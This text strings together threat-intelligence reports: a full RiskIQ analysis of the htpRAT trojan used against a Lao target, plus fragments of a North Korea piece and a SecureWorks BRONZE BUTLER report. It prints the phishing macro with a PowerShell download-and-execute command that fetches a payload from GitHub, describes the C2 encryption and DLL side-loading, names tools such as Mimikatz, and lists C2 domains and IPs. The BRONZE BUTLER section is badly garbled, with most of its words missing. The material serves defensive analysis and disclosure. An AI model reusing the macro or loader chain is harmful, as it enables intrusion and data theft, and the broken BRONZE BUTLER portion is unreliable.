alert to a wide range of cyber activity from North Korea, including DDoS, destructive malware, and ransomware
attacks. Broadly, organizations in all sectors should continue to be aware of the adaptability of ransomware and
modify their cyber security strategies as the threat evolves.
This is part one of a two-part series on North Korea. In part two, we will examine patterns of behavior and internet
activity from North Korea, including the widespread use of virtual private servers (VPS) and virtual private networks
(VPN) to obfuscate browsing, internet transactions, and other, possibly malicious, activity.
Remote Control Interloper:
Analyzing New Chinese htpRAT
Malware Attacks Against ASEAN
By Yonathan Klijnsma
Table of Contents
Introduction................................................................................................................................................................................ 3
Initial infection through
APA List.xls
......................................................................................................................... 4
GitHub repositories for payload delivery...................................................................................................................... 5
Staged delivery of the final htpRAT core...................................................................................................................... 9
Analysis of the htpRAT core...............................................................................................................................................11
Persistence & storage.............................................................................................................................................................11
Communication protocol.....................................................................................................................................................12
Execution of operator commands...................................................................................................................................15
Infrastructure analysis..........................................................................................................................................................16
Other activity by the actor using htpRAT..................................................................................................................18
Indicator of compromise.....................................................................................................................................................19
Introduction
On November 8, 2016 a non-disclosed entity in Laos was spear-phished by a group closely related to
known Chinese adversaries and most likely affiliated with the Chinese government. The attackers utilized a
new kind of Remote Access Trojan (RAT) that has not been previously observed or reported.
The new RAT extends the capabilities of traditional RATs by providing complete remote execution of
custom commands and programming. htpRAT, uncovered by RiskIQ cyber investigators, is the newest
weapon in the Chinese adversary
s arsenal in a campaign against Association of Southeast Asian Nations
(ASEAN).
Most RATs can log keystrokes, take screenshots, record audio and video from a webcam or microphone,
install and uninstall programs and manage files. They support a fixed set of commands operators
can execute using different command IDs
file download
or
file upload,
for example
and must be
completely rebuilt to have different functionality.
htpRAT, on the other hand, serves as a conduit for operators to do their job with greater precision
and effect. On the Command and Control (C2) server side, threat actors can build new functionality in
commands, which can be sent to the malware to execute. This capability makes htpRAT a small, agile, and
incredibly dynamic piece of malware. Operators can change functionality, such as searching for a different
file on the victim
s network, simply by wrapping commands.
The file
APA list.xls
(sha256: f2e7106b9352291824b1be60d6772c29a45269d4689c2733d9eefa0a88eeff89)
was delivered through email:
The top part contains Lao and English:
Enable Content
roughly
translates as
You can click
Enable Content
to (see/change) the data,
with an added example image of
how to enable the macros in the document. Based on embedded metadata inside the Excel sheet, the
last modified date on the file was
Mon Nov 07 07:18:32 2016,
meaning the document was prepared just
before sending it to the target.
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
Initial infection through
APA List.xls
The XLS document contains the following macro:
Attribute VB_Name =
ThisWorkbook
Attribute VB_Base =
0{00020819-0000-0000-C000-000000000046}
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Set objshell = CreateObject(
wscript.shell
a = objshell.Run(
cmd.exe /s /c
powe
rshell
(New-Object System.Net.
WebClient).DownloadFile(\
https://raw.githubusercontent.com/justtest1314/justme2/
master/20160728.jpg\
,$env:appdata+\
\\ctfmon.exe\
; && start %appdata%\\
ctfmon.exe
, 0, False)
Set objshell = Nothing
Sheet3.Visible = 1
Sheet2.Visible = 1
Sheet1.Visible = 1
Sheet1.Unprotect
Sheet1.Activate
Chart3.Visible = 0
End Sub
Once the macro is enabled, the following PowerShell command runs to download a file and execute it (the
downloaded file is stored in the Application Data folder in the user
s local profile). It is interesting to note
the use of GitHub over HTTPS to stage the payload:
cmd.exe /s /c powershell (New-Object System.Net.WebClient).DownloadFile(
https://
raw.githubusercontent.com/justtest1314/justme2/master/20160728.
,$env:appdata+
\\ctfmon.exe
); && start %appdata%\\ctfmon.exe
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
GitHub repositories for payload delivery
The threat actor behind this attack uses GitHub repositories to store second stage payloads. The user
account used on GitHub is
justtest1314
which holds three repositories, two of which have never been
used since they were created. The third repository named
justme2
has been actively used to test
different variations of transferring a payload from GitHub to a target machine over the course of six
to seven months. The account and the initial repository were created on March 30, 2016, with the first
commits starting the same day.
Since the attack on the target in Laos, the attacker decided to clear out the repository. The files were
prepped and ready for possible attacks since July 28, three months before the above documented
attack. The files were removed on November 18, approximately 10 days after the attack against the
Lao organization took place. The actor did not remove the actual repository, but rather cleared out the
repository using commits in which the attacker removed the files. This allowed us to get the whole history
of all the commits over time as well as every payload (and every version of the payload):
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
Based on the Git commit history, we can make a small table showing which file was changed at what time:
Commit
timestamp
Commit hash
Files added
Files
changed
Files deleted
Mar 30, 2016, 3:55
AM GMT+2
9760f003facc0428e44a5e4da2d3d591c6d711ef
README.md
Mar 30, 2016, 3:56
AM GMT+2
cac8dace24e03a48b804e36a50d24f7747538ffc
8001.exe
Mar 30, 2016, 3:56
AM GMT+2
21e84fa5897de3c7e85d871e4ba33cb0611232ea
Mar 30, 2016, 3:58
AM GMT+2
bebf35aeb82b80249312ed12cf0df81409537149
test.zip
Apr 1, 2016, 10:16
AM GMT+2
530ce17aa21250d9ce38525f353badb8c2f0c859
ctfmon.jpg
Apr 20, 2016, 3:07
AM GMT+2
87d999a3dc71a77ff95ec684e0805505dd822764
script.jpg
May 5, 2016, 4:54
AM GMT+2
a63e06112517d9d734b053764354b66e20f12151
2011.jpg
May 5, 2016, 4:58
AM GMT+2
eda99ee315d4702b02646a4d8c22b5e2eb5aa01f
2011.jpg
May 5, 2016, 5:10
AM GMT+2
9d43ce169be6c773d8cfc755b36a26118c98ad1d
2011.jpg
Jul 28, 2016, 10:55
AM GMT+2
e2d697dd03fa6ca535450a771e9b694ae18c22ce
Nov 18, 2016, 5:00
AM GMT+2
f9ba255f5ce38dbe7a860b1de6525fdb5daf9f86
test.zip
Nov 18, 2016, 5:00
AM GMT+2
3cf50c62107265916777992f7745a1a0ec381d6f
script.jpg
Nov 18, 2016, 5:00
AM GMT+2
bf74c7199eb643fbb2ee998a643469f155439e18
ctfmon.jpg
Nov 18, 2016, 5:00
AM GMT+2
75b55d9dc45b245b91a3bbd5ebaf64a76dee1f56
20160728.
Nov 18, 2016, 5:01
AM GMT+2
fc2a6c0e53b15c93d392f605f3180a43c7c0c78e
2011.jpg
8001.exe
20160728.jpg
While only 20160728.jpg was used in the above mentioned attack, there are many other available
payloads. All files besides 2011.jpg are portable executables. 2011.jpg is in fact a scriptlet file containing
some VBS scripting to download the
test.zip
file seen in the above commit log. The scriptlet looks like
this (the three versions only had minimal changes, most importantly the Target variable was changed to a
random path as to not conflict with already existing files):
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
Test.zip is the first stage payload of htpRAT, similar to the 20160728.jpg file downloaded by the XLS
mentioned at the start of this report. The following table lists the files and their respected MD5 and
SHA256 values (note, 2011.jpg exists multiple times due to the multiple commits/changes done on this file:
Filename
SHA256
2011.jpg (commit:
9d43c169be6c773d8cfc755
36a26118c98ad1d)
a164a57e10d257caa1b6230153c05f5d
ccfccbe54af2aec39a85d28b22614e2f
43d084a2bcadeae75cad488a8957d862
2011.jpg (commit:
a63e06112517d9d734
053764354b66e20f12151)
01cddd0509d725c0ee732e2ef6109ecd
4b2f8cf7d6b2220cc17c66755564e68d3ab997a
f1ab3f47cbe2fa79293b3d38c
2011.jpg (commit:
eda99ee315d4702b02646a4
8c22b5e2eb5aa01f)
81b11c60b28a17c8a39503daf69e2f62
6b4f605e4cffce074e683f2ade409a
56c318a34f1e4b6b0f15b582c5c66b64e9
20160728.jpg
5fa81da711581228763a7b7c74992cf8
593e13dca3ab6ce6358eec09669f69faef40f1e
67069b08e0fe3f8451aaf62ec
8001.exe
417a608721e9924f089f9143a1687d97
c098cca96c124325d89b433816e6e7fd0b14c51b
287c254314f96560975f7864
ctfmon.jpg
d5a9d5d1811c149769833ae1cd3b1aca
ee1ea9df1f8d7aaa03a93692c1deab09e8d
834d52e9d5971d013ed259d30229c
script.jpg
417a608721e9924f089f9143a1687d97
c098cca96c124325d89b433816e6e7fd0b14c51b
287c254314f96560975f7864
test.zip
417a608721e9924f089f9143a1687d97
c098cca96c124325d89b433816e6e7fd0b14c51b
287c254314f96560975f7864
Staged delivery of the final htpRAT core
The analysis starts from the downloaded payload coming from the
APA list.xls
file. The payload was
downloaded to the application data folder and renamed to
ctfmon.exe
from the original
20160728.jpg
name (SHA256: 593e13dca3ab6ce6358eec09669f69faef40f1e67069b08e0fe3f8451aaf62ec).
The author calls this first package
Microsoft
based on the project PDB path still left in the binary:
C:\Users\cool\Documents\Visual Studio 2010\Projects\microsoft\Release\microsoft.pdb
Upon execution, it first checks if a debugger is active as well as checks if it is able to execute the
ipconfig
utility, most likely to ensure the next step will succeed. It then proceeds to drop a CAB file named
temp.
in the local temp directory. The CAB file is a compressed bundle containing the third stage of the
infection. The code decompresses the CAB file by running the Microsoft
expand
utility locally. The
following three files from the CAB file are placed in the local application data folder in a subfolder called
Microsoft
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
Filename
SHA256
data
69d24b6fdc87af3a04318e1502e07977
0e2491e1f0e1467121b15b9d03b3fe73ac0a5aa85dc949f8e627ed3
848bdc68a
fsma32.dll
a58f3f9441b4ecc9a0e089578048756f
6cf1cff2e0d1b2d91c417f962a2623077b29318499f8e43e1e
6865ba1eefd234
winnet.exe
c452cd2cc4c91b7da55e83b9eff46589
a80df73828b3397b5e120f3a3b3dee3cee2672aaa2ccb2134c68b2f
fe13c0725
After decompressing the files, the
winnet.exe
file is executed. This file is a legitimate piece of software;
it is a part of the F-Secure antivirus suite and used here because it is vulnerable to DLL side loading.
The antivirus component normally loads code from a file called
fsma32.dll,
which on a normal system is
also a component of the antivirus product, but due to the way it searches for this file and performs no
verification of its legitimacy, a malicious version of fsma32.dll is started.
The author calls this DLL
windows
based on the project PDB path still present:
C:\Users\cool\Documents\Visual Studio 2010\Projects\windows\Release\windows.pdb
The DLL loads the
data
file, also decompressed from the CAB file, decrypts it and loads the decrypted
content into memory and executes it. The decrypted data content is, in fact, also a DLL file, the
C:\Users\cool\Documents\Visual Studio 2010\Projects\dll\Release\dll.pdb
fourthstage of the infection. The author calls this DLL
based on the project PDB path still present left:
C:\Users\cool\Documents\Visual Studio 2010\Projects\htpdll\Release\htpdll.pdb
This fourth stage of the infection is quite simple. It starts a new svchost process and decrypts a fifth stage
payload it internally has stored and injects this into the svchost process. This starts a remote thread inside
the svchost process to run the injected code. This final payload and the fifth stage is called
htpdll
based
on the project PDB path (this is where the name htpRAT comes from):
The fifth stage is the final stage and contains the core of the RAT which communicates with the C2 server
and executes the attacker
s commands.
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
Analysis of the htpRAT core
At its core htpRAT is a simple and generically implemented RAT with some quite interesting
implementations of its communication protocol, command execution and configuration storage systems.
Persistence & storage
Initially when htpRAT starts it creates a mutexes to ensure there is only one instance running. The name of
the mutex can be used as an indicator on an active system, it is hard coded as:
{3084ADEC-04CF-4981-B6A0-87DC5C385E24}
It then obtains its local path in the appdata folder (which is %LOCALAPPDATA%\Microsoft\). This path is
used to store a file called
token.ini
in which the system uptime (in milliseconds) is contained. The token.ini
file is formatted using the INI format through the use of the GetPrivateProfileString and WriteProfileString
functions of the WinAPI. htpRAT uses the following hardcoded information to structure its app and key
names in the INI file. This can be used to filter out legitimate
token.ini
files, if encountered:
{3084ADEC-04CF-4981-B6A0-87DC5C385E24}
Once htpRAT has its INI file written, it sets a startup entry in the registry to ensure automatic startup
when a system is rebooted. A key is created under:
Software\\Microsoft\\Windows\\CurrentVersion\\Run
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
The keyname
WindowsApp
has the value of the wininit.exe binary location in the Microsoft subfolder in
local appdata.
Communication protocol
htpRAT uses a custom communication protocol utilizing a JSON format internally which is encrypted and
wrapped in HTTP requests. The base format of a request sent to the C2 server looks like this:
command:
content:
mid:
cid:
Individually the field values contain the following:
command: The type of action/command the request has data for in its content field. The two
known values for this are:
online: Set when the malware is polling the C2 server for new commands. (It also functions as
an initial check-in; the client simply starts polling for commands on startup). When this value is
set, the content field contains the following fields:
tag: The campaign tag which is hardcoded.
name: The computer name is obtained via a call to GetComputerName from the WinAPI.
cmd: This value is seen when the client has executed commands as per instructions from the C2
server. When this value is set, the content field contains the result from executing the command
obtained from the C2. Additionally the cid field contains a special command ID used for this
command.
content: The command field can contain a subset of different keywords that change the content of
the
content
field. The field then contains the result provided by the operator on the C2 side as
long as the command field is set to
. Otherwise, when the command field is set to
online
this field contains the campaign tag and computer name as explained in the subsection above. The
data in this field is base64 encoded when it is assigned to this field to retain any newlines / data, as
it can contain arbitrary data from command execution results.
mid: A unique machine ID based on the GetTickCount value, which is called the first the RAT ever
runs. This function returns the amount of milliseconds the system has been up, this is used (in
combination with the computer name) to identify a unique client.
cid: The command ID either set to online when polling for new commands, or it is set to the
command ID supplied by the C2. When a command is obtained from the C2, this command
contains a special command ID supplied by the actor issuing the command. This command ID is
replicated back to the C2 with the results of the requested command.
The completed JSON object is, after being filled with the correct information, encrypted before being sent
to the C2 through a HTTP POST request. The encryption of the POST data is done with a custom algorithm.
A key is generated per request to the C2 server and is seeded through the return of the GetTickCount
function. First a 10 character string is generated by picking 10 numbers at random. The pipe symbol | is
added at the end of the string making the entire key 11 characters. The check-in JSON data is then XOR
with the generated key. Then the data is prepared for the POST request as follows:
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
The key is XOR
d with itself character by character: first character with the second, second with the
third until the last character is hit which is XOR
d with the first character again.
The encrypted checkin data is prepended with the encrypted key and then encoded with base64.
The first character of the plain XOR key is prepended in front of the base64 encoded data.
This prepending of the first key of the XOR key allows the C2 server to calculate back the entire key and
decrypt the data. To give a good example of this protocol, we can work it back from from a network
capture of a victim checking in to the C2 server:
The encrypted communication blob is:
5BQQECQ0FBwIDS0lOEldfVFlQWFAVRhdfWlxQWlQUGBdeVl9aRFxaRRQUDVwXVU16CW1mVV14FX9Ebl
wR3h1fkIlYgFYeVB1B393fTlgAFxgb2J/cH1ZTAgSGBAbWVhSFhdGFRIFBQoCBAUGD14ZEBZTUFAT
g4XXlpeWFlXURNL
The first layer of the data is the first plaintext character of the XOR key followed by the base64 encoded
and XOR
d check-in data. We can split up like this:
First character of the key: 5
Base64 encoded check-in data:
BQQECQ0FBwIDS0lOEldfVFlQWFAVRhdfWlxQWlQUGBdeVl9aRFxaRRQUDVwXVU16CW1m
V14FX9EblwR3h1fkIlYgFYeVB1B393fTlgAFxgb2J/cH1ZTAgSGBAbWVhSFhdGFRIFBQo
BAUGD14ZEBZTUFATFg4XXlpeWFlXURNL
First thing to do is decoding the XOR key out of the data. We decode the base64 data and grab the first
11 bytes. We XOR the first byte of this data with the first character we obtained from the check-in, this
gives us the second character of the key. With the second character of the key we can XOR the third and
so on. We continue this until we get the entire key back in plaintext, for the provided data above the key
is: 5040941647|
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
In python extracting the key from the check-in data looks like this:
We can, using the extracted key, decrypt the rest of the data with a simple XOR loop. Decrypted we end
up with the following JSON data for this check-in:
For its HTTP communication htpRAT uses a hardcoded user-agent:
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
While not in use in this attack, htpRAT has an internal configuration which allows the operator to build
htpRAT clients with any of the following:
Proxy information (username, password, url)
Arbitrary raw request headers and data
Explicitly it has a field for the
Cookie
header
WinHTTP request options (Timeouts)
These options are visible when we reverse engineered the malware, but they were not put to use in this
build of htpRAT.
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
Execution of operator commands
The design of htpRAT differs from
common
RATs. Most RATs feature a fixed set of commands that
attackers can execute with different command IDs. For example, file download or file upload would both
be unique functionalities of the RAT. htpRAT doesn
t adhere to this structure. Instead, the malware creator
decided to generalize this concept by having the RAT execute commands directly as provided from a
C2 server. This means, for example, there is no specific function to get screenshots on the host; instead,
on the C2 server side, the operator has a button which says
Get Screenshot
which simply generates a
set of commands to execute through something like PowerShell to take a screenshot. This makes htpRat
dynamic and, subject to change. Any new functionality the operators want they simply implement by
wrapping commands on the C2 without having to update the htpRAT source code.
Coincidentally, this also means we cannot give a fixed list of functionality for this RAT. Its functionality is
completely dependent on what rights the RAT was able to obtain upon installation and what the operator
wants to do.
The way the execution of commands when the bot starts is implemented is as follows, :
A separate command prompt process is started which can be communicated with via named pipes.
Any incoming commands from the C2 are executed via the named pipes on the sub process.
Results are read from the named pipe and communicated back to the C2 server.
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
Infrastructure analysis
Based on the analysis of the malware we know that qf.laoscript.org is the C2 host for this malware.
The WHOIS data for this domain is quite interesting as the name
John Durdin
can be seen on multiple
domains, but what stands out is the difference in email address used in the registrations. The following is a
search on domain registrations for this name in PassiveTotal--most have the same email address, but one
stands out. The email address is the registered domain:
If we look more closely, we see that there is also a .NET domain for laoscript. The C2 domain is clearly
registered to raise fewer suspicions by mimicking the other domain. It becomes even more clear when we
see all the registration information was just copied if you compare laoscript.net and laoscript.org:
The only thing the actor could not fake was the email address due to the fact that an email address must
be used to activate the domain at the registrar. The use of the laoscript name is quite interesting as it
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
shows real active targeting. The real laoscript website is a piece of software that helps with the input of
the Lao language text on computers which gives the actor good leverage for social engineering:
Looking at the domain we can see it has been registered since 2014 which means this C2 domain has
been under the control of the actor for at least two years. We can also see that in the past, the domain
has been used in other attack campaigns as well which indicates there are more yet undiscovered victims.
There are also two samples that connect to qf.laoscript.org which are not htpRAT, they are in fact
variations of the well known PlugX malware:
5e0019485fbfa2796ec0f1315c678b4a3fb711aef5d97f42827c363ccd163f6d (First seen
2015-07-10)
eeb34edec5fd04e6a44bf5c991eaf79c68432d4d0037b582bcd9062cc2b94c62 (First seen
2015-07-17)
Both also use DLL side loading techniques but using a different antivirus product to leverage execution
through. Still this means there
s an active connection between the current actors with the new unknown
htpRAT and where they in the past used PlugX. While we can only guess for reasons why this actor
decided to develop their own tool instead of continuing to use PlugX, it seems it is at least a step up in
terms of detection of the malware. PlugX was becoming quite common and easy to detect on both the
network as well as file system level.
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
Other activity by the actor using htpRAT
Going through older samples connecting to the C2 domain for htpRAT, we mostly find a variety of
PlugX samples. We also ran into the exploit activity by the group, ShadowServer, documented in their
paper,
The Italian Connection: An analysis of exploit supply chains and digital quartermasters.
Page six
describes the use of the HackingTeam leaked exploits by various groups.
One interesting connection is a piece of malware called
MyHNServer
which is a packaged PlugX payload.
This sample also connects to
qf.laoscript.org
and has quite an interesting PDB path:
The first foldername
is interesting; in context it translates to the
elderly
or
brother
group most likely referring to a more senior/experienced and respected group. If we correlate
samples based on this PDB path, we get into some really interesting attacks. One other PDB path
we can find based on the group
s name is for another piece of malware called
MyCL
(sha256:
2fa07d41385c16b0f6ad32d12908db1743ca77db0b71e6cfd0fde76ef146e983):
The first word
means
source code,
and the second
means
victims.
By itself the sample isn
that interesting, although it isn
t PlugX or htpRAT. It is interesting because of the C2 server used:
data.
dubkill.com
. This domain has been widely used in other attacks in Vietnam as documented by BKav, a
Vietnamese security company: http://genk.vn/internet/vu-gia-mao-email-ket-luan-thu-tuong-phat-hienbien-the-virus-bien-dong-2015060612185601.chn. Looking at the registration information for the dubkill
domain, we can find an interesting link to a more recent government attack. The domain is registered to
a person using the email address
dubkill@163.com,
this same email address was also used to register
dcsvn.org
which was used to imitate the official military domain in Vietnam. This attack was publicly
documented by BKav (http://security.bkav.com/home/-/blogs/malware-attacking-vietnam-airlinesappears-in-many-other-agenci-1/normal?p_p_auth=DHFn7deT) and the Vietnamese government (http://e.
gov.vn/theo-doi-ngan-chan-ket-noi-va-xoa-cac-tap-tin-chua-ma-doc-a-NewsDetails-37486-14-186.html).
Additionally there is IP address overlap between
dcsvn.org
and
laoscript.org
in 2015.
Following all these links over WHOIS, the shared domains and shared working paths reveals the
adversary
s web is wider and deeper than expected. While this report was solely written to inform
about a new piece of malware used by this adversary this last section highlights the size and amount of
operations.
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
Indicator of Compromise
While we mentioned some other C2 domains in this article, the IOCs listed below tie in directly with
confirmed activity for htpRAT for the above detailed campaign. All those IOCs can also be obtained from
the public PassiveTotal project which will be kept in sync with new developments: [%PT PROJECT%].
htpRAT Network IOCs:
Domain
qf.laoscript.org
128.199.245.204
htpRAT Filesystem IOCs:
Filename
SHA256
data
69d24b6fdc87af3a04318e1502e07977
0e2491e1f0e1467121b15b9d03b3fe73ac0a5aa85dc
949f8e627ed3848bdc68a
fsma32.dll
a58f3f9441b4ecc9a0e089578048756f
6cf1cff2e0d1b2d91c417f962a2623077b29318499f8e43e1e
6865ba1eefd234
winnet.exe
c452cd2cc4c91b7da55e83b9eff46589
a80df73828b3397b5e120f3a3b3dee3cee2672aaa2ccb2134c68b2f
fe13c072
2011.jpg
a164a57e10d257caa1b6230153c05f5d
ccfccbe54af2aec39a85d28b22614e2f43d084a2bcadeae75ca
d488a8957d862
2011.jpg
01cddd0509d725c0ee732e2ef6109ecd
4b2f8cf7d6b2220cc17c66755564e68d3ab997af1ab3f47cbe
2fa79293b3d38c
2011.jpg
81b11c60b28a17c8a39503daf69e2f62
6b4f605e4cffce074e683f2ade409a56c318a34f1e4b6b0f15b582c
5c66b64e9
20160728.
5fa81da711581228763a7b7c74992cf8
593e13dca3ab6ce6358eec09669f69faef40f1e67069b08e0fe
3f8451aaf62ec
8001.exe,
script.jpg,
test.zip
417a608721e9924f089f9143a1687d97
c098cca96c124325d89b433816e6e7fd0b14c51b
287c254314f96560975f7864
ctfmon.jpg
d5a9d5d1811c149769833ae1cd3b1aca
ee1ea9df1f8d7aaa03a93692c1deab09e8d834d52e9d5971d013ed2
59d30229c
APA list.xls
f6d75257c086cd20ec94f4f146676c6e
f2e7106b9352291824b1be60d6772c29a45269d4689c2733d9eef
a0a88eeff89
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
htpRAT Miscellaneous IOCs:
Description
Value
INI key name
{80478813-B963-4C21-953E-D51544A1863B}
Runtime mutex
{3084ADEC-04CF-4981-B6A0-87DC5C385E24}
Useragent
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Registry startup keyname
WindowsApp
qf.laoscript.org
128.199.245.204
Additional IOCs related to the
Other activity by the htpRAT group
section are listed below. These contain
a raw dump of observed samples, domains and IPs. This last set of IOCs is not tracked in the public PT
project linked above. Also keep in mind there is a substantial amount of historical IP addresses for the
domains in the list below which aren
t related to current activity. They are only shone in combination with
the adjoining domain names. This section is quite raw and unstructured: the only connection is through
shared infrastructure from the htpRAT campaign.
Additional network IOCs:
Description
91.109.29.115
download.laokey.com
103.193.4.164
43.249.38.250
ftp.laokey.com
91.109.29.115
128.199.245.204
103.193.4.164
laokey.com
43.249.38.250
128.199.245.204
43.249.38.250
mysqlupdate.hopto.org
80.255.3.101
91.109.29.115
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
Description
103.193.4.164
86.106.131.12
43.249.38.250
91.109.29.115
la.laoscript.org
128.199.245.204
116.251.223.148
27.255.94.75
216.158.86.233
191.101.242.101
download.laoscript.org
119.59.123.114
115.84.101.75 (IP address for the MOFA of Laos, the server wasn
t compromised as far as we
know)
image.laoscript.org
116.251.223.212
119.59.123.114
119.59.123.58
61.195.97.204
la.proxyme.net
128.199.245.204
128.199.89.28
Additional filesystem IOCs:
Filename
SHA256
favicon.ico
27b318e103985fb4872ea92df1d2f35a
56c3909c19e9fb934ef6d1f73fbfe3d05935933c0c071fc23ad
ce05d545b8965
fb7376074cd98d2ac9d957cba73d054e
5e0019485fbfa2796ec0f1315c678b4a3fb711aef5d97f42827c
363ccd163f6d
863f83f72b2a089123619465915d69f5
e7264a8ed7ed9145e6cdbcfe55e9a0d00f4df70becb62a83496c
34548c5c7bdf
Remote Control Interloper: Analyzing New Chinese htpRAT Malware Attacks Against ASEAN
For a full, continuously updated list of IOCs related to htpRAT, visit the RiskIQ Community Public Project
here: https://community.riskiq.com/projects/521b4b80-1f00-c485-ba1d-70fa223a1933
Learn how RiskIQ could help
protect your digital presence by
scheduling a demo today.
RiskIQ is the leader in digital threat management, providing the most comprehensive
discovery, intelligence, and mitigation of threats associated with an organization
digital presence. With more than 75 percent of attacks originating outside the
firewall, RiskIQ allows enterprises to gain unified insight and control over web,
social, and mobile exposures. Trusted by thousands of security analysts, RiskIQ
platform combines advanced internet data reconnaissance and analytics to expedite
investigations, understand digital attack surfaces, assess risk, and take action to protect
business, brand, and customers. Based in San Francisco, the company is backed by
Summit Partners, Battery Ventures, Georgian Partners, and MassMutual Ventures.
22 Battery Street, 10th Floor
San Francisco, CA. 94011
sales@riskiq.net
RiskIQ.com
1 888.415.4447
@RiskIQ
2017 RiskIQ, Inc. All rights reserved. RiskIQ is a
registered trademark and Digital Footprint is a
trademark of RiskIQ, Inc. in the United States and other
countries. All other trademarks contained herein are
property of their respective owners. 10_17
BRONZE BUTLER
June 23, 2017
Security & Risk Consulting
Counter Threat Unit
Copyrights and Trademarks
2017 SecureWorks, Inc. All rights reserved. Trademarks and trade names may be used in this
document to refer to either the entities claiming the marks and names or their products.
SecureWorks and its affiliates disclaim responsibility for errors or omissions in typography or
photography. SecureWorks and its affiliates
terms and conditions of sale apply. A printed hard
copy of SecureWorks
terms and conditions of sale is available upon request.
2017 SecureWorks Inc. All rights reserved.
SecureWorks
SecureWorks
SecureWorks
.................................................................................................. 1
BRONZE BUTLER
....................................................... 2
BRONZE BUTLER
............................................................................ 2
BRONZE BUTLER
........................................................................... 2
.......................................................................................... 2
BRONZE BUTLER
..................................................................... 3
..................................................................................... 3
............................................................... 3
...................................................................................... 3
....................................................................................... 3
................................................................................. 4
....................................................................................... 4
BRONZE BUTLER
................................................................. 5
........................................................................................... 5
................................................................................................ 6
4.2.1
SKYSEA Client View
.................................................................................... 7
4.3.1
............................................................................. 7
4.3.2
RAT.................................................................................... 7
............................................................................................. 9
4.4.1
............................................ 9
4.4.2
............................................. 10
4.4.3
.............................................................................. 11
.............................................................................. 12
4.5.1
............................................................................. 12
4.5.2
....................................................................... 14
............................................................................................. 14
.................................................. 15
....................................... 15
5.1.1
............................................... 15
5.1.2
............................................................... 16
5.1.3
...................................................... 16
5.1.4
........................................................ 16
5.1.5
............................................... 17
5.1.6
................................................................................ 17
5.1.7
Windows
......................................................... 18
5.1.8
......................................................... 18
5.1.9
Active Directory
........................................................ 18
5.1.10 SKYSEA Client View
......................................................... 19
5.1.11
................................... 19
........................... 19
5.2.1
.................................. 19
5.2.2
................................................................................ 19
5.2.3
......................................................................... 20
5.2.4
................................................. 20
................................................................................................. 21
Appendix A:
................................................................. 22
HTTP
......................................................................................... 22
......................................................................... 23
.................................................................... 23
....................................................................................... 24
........................................................................................ 24
SecureWorks Japan
SecureWorks
SecureWorks
2012
2016
2015
Emdivi
http://www.nenkin.go.jp/oshirase/topics/2015/0104.html
Active Directory
SecureWorks
https://www.secureworks.jp/capabilities/incident-response/incidentmanagement/targeted-threat-hunting
AETD Red Cloak
https://www.secureworks.jp/capabilities/managed-security/endpointsecurity/red-cloak
AMPD
https://www.secureworks.jp/capabilities/managed-security/networksecurity/advanced-malware-protection
Page 1
BRONZE BUTLER
2.1 BRONZE BUTLER
SecureWorks
Counter Threat Unit
BRONZE BUTLER
BRONZE BUTLER
2016
BRONZE BUTLER
- Security Response:
Tick
https://www.symantec.com/connect/nl/blogs/tick?page=1
- CYBER GRID VIEW:
https://www.lac.co.jp/lacwatch/report/20160802_000385.html
SecureWorks
BRONZE BUTLER
2.2 BRONZE BUTLER
BRONZE BUTLER
2.3
BRONZE BUTLER
SecureWorks
3. BRONZE BUTLER
3.1
3.2
3.3
3.4
Page 3
3.5
3.6
4. BRONZE BUTLER
Source: SecureWorks
Page 5
2015
Flash Player
2017
C:\Intel\Logs>pt.exe 172.16.xx.xx 52300
target ip :172.16.xx.xx
target port :52300
connect success
2016/06/xx xx:xx:xx:244
ExecMacroThread.cpp
1304:1500
2016/06/xx xx:xx:xx:384
ExecMacroThread.cpp
1304:1500
App=C:\Program Files\Sky Product\SKYSEA Client View\tmp\00000001.BIN, PID=6251
4.3
RAT
RAT
PowerShell
VBS
VBE
HTTP
RAT
RAT
50MB
100MB
RAT
50MB
SecureWorks
Const ForAppending = 8
set objTextFile = fso.OpenTextFile (s1, ForAppending, True)
do objTextFile.WriteLine("000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000")
i=i+1
if i=524288 then exit do end if loop objTextFile.Close
RAT
RAT
Daserf
URL
RAT
2015
Page 7
Datper
URL
RAT
Daserf
xxmm
URL
RAT
Daserf
Datper
Minzen
HTTP
HTTP
1 RAT
HTTP
Daserf
POST
Daserf
POST
Datper
POST
xxmm
POST
Daserf
Datper
URL
xxmm
AES
RAT
Internet Explorer
Internet Explorer
SecureWorks
RAT
Datper
xxmm
2 RAT
Source: SecureWorks
SecureWorks
xxmm
BRONZE
BUTLER
RAT
3 xxmm
Source: SecureWorks
4.4
BRONZE BUTLER
Windows
o net, ping, at, schtasks, systeminfo
Page 9
o Mimikatz
o WCE (Windows Credential Editor)
o gsecdump
T-SMB
o WinRAR
Windows
RAR
WinRAR
do.cs
do.exe
c:\PerfLogs\Admin>echo using System.Net; >do.cs
